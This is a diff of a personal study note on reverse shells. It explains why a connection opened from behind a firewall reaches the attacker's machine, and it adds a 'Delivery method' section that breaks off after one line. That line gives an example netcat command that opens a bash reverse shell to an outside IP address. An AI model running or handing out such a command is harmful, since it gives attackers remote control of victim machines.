Mibu287/obsidian-vault/security/Reversed Shell.md

 ==> Now computer A can execute shell command on Computer B.

-If computer B is inside a private network without dedicated public IP or computer B is behind firewall ==> Computer A can not initiated connection to Computer B. However, connection initiated by Computer B is more likely to pass firewall
+If computer B is inside a private network without dedicated public IP or computer B is behind firewall ==> Computer A can not initiated connection to Computer B. However, connection initiated by Computer B is more likely to pass firewall and/or connect to Computer A (which has public IP and no firewall).

+# 3. Delivery method

+Reversed shell command (like `nc -e /bin/bash 1.1.1.1 80`) can be delivered to victim